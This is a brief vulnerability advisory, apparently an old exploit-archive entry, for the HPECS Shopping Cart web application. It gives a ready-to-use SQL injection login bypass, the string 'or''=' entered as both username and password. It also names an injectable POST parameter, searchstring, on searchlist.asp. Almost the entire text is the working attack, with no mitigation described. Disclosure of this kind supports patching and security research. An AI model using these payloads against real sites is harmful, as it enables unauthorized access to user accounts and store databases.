hpecs shopping cart[login bypass & injection sql (post)]

vendor site:http://hpe.net/ product:hpecs shopping cart bug:injection sql risk:high login bypass : username: 'or''=' passwd: 'or''=' injection sql post : http://site.com/searchlist.asp variables: HpecsFind=maingroup&searchstring='sql or just post your query in the search engine ... laurent gaffie...